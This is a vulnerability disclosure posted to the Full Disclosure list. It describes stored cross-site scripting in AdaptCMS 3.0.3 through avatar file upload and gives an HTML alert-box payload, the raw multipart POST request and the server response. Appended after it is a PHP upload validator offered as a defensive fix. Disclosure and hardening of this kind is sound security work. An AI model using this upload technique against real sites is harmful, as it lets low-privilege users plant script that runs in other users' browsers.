Message-ID: <CAF2Wu1a=djO6=snv477RqrEUzMmPiFWx4fFe7QrmyzXHzDpUww@mail.gmail.com>
Date: Sun, 1 Jun 2025 16:11:43 +0100
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Stored XSS via File Upload - adaptcmsv3.0.3

# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS via File Upload #1:

Steps to Reproduce:

1. Login with low privilege user and visit "Profile" > "Edit Your Profile" > "Avatar"
2. Click on "Choose File" and upload the following file

html-xss.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>

// HTTP POST request uploading the XSS file

POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]

[...]
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[User][settings][avatar]"; filename="html-xss.html"
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[_Token][fields]"

// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 20:15:54 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 15400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail col-lg-2" alt="" />
<input type="hidden" name="data[User][settings][old_avatar]" value="1_html-xss.html" id="UserSettingsOldAvatar"/>
<div class="clearfix"></div>
[...]

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
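
A defensive counterpart to the upload shown in the report, added here as an example and not taken from AdaptCMS or from the original post: an avatar validator that allowlists image extensions, checks the leading magic bytes instead of trusting the request's Content-Type, and stores the file under a server-generated name. The function names are hypothetical, the sample inputs are constructed, and openssl_random_pseudo_bytes() is used on the assumption that the OpenSSL extension is loaded, because the PHP 5.6 in the response headers predates random_bytes().

```php
<?php
// Added example, not AdaptCMS code. validateAvatar() and avatarSignatures()
// are hypothetical names; the sample inputs below are constructed.

// Accepted extension => leading magic bytes of that image format.
function avatarSignatures() {
    return array(
        'png'  => "\x89PNG\r\n\x1a\n",
        'jpg'  => "\xFF\xD8\xFF",
        'jpeg' => "\xFF\xD8\xFF",
        'gif'  => "GIF8",
    );
}

// Returns a server-generated file name for an accepted image, or false.
// The client-supplied name only contributes its allowlisted extension,
// so nothing like "1_html-xss.html" can end up under uploads/avatars/.
function validateAvatar($clientName, $tmpPath, $userId) {
    $sigs = avatarSignatures();
    $ext  = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset($sigs[$ext])) {
        return false;                   // .html, .svg, .php, no extension
    }
    // The multipart Content-Type header is client-controlled; read the bytes.
    $head = file_get_contents($tmpPath, false, null, 0, strlen($sigs[$ext]));
    if ($head !== $sigs[$ext]) {
        return false;                   // content does not match the extension
    }
    $random = bin2hex(openssl_random_pseudo_bytes(16));
    return (int) $userId . '_' . $random . '.' . $ext;
}

// Constructed samples: HTML as in the report, the same HTML renamed to .png,
// and a buffer that starts with a real PNG signature.
$samples = array(
    'html-xss.html' => '<!DOCTYPE html><body onload="showAlert()">',
    'renamed.png'   => '<!DOCTYPE html><body onload="showAlert()">',
    'avatar.png'    => "\x89PNG\r\n\x1a\n" . str_repeat("\0", 16),
);
foreach ($samples as $name => $bytes) {
    $tmp = tempnam(sys_get_temp_dir(), 'ava');
    file_put_contents($tmp, $bytes);
    $stored = validateAvatar($name, $tmp, 1);
    echo $name, ' => ', ($stored === false ? 'rejected' : $stored), "\n";
    unlink($tmp);
}
```

Because the stored extension always comes from the allowlist, the web server labels the file as an image; sending `X-Content-Type-Options: nosniff` for the avatar directory keeps browsers from reinterpreting it as HTML.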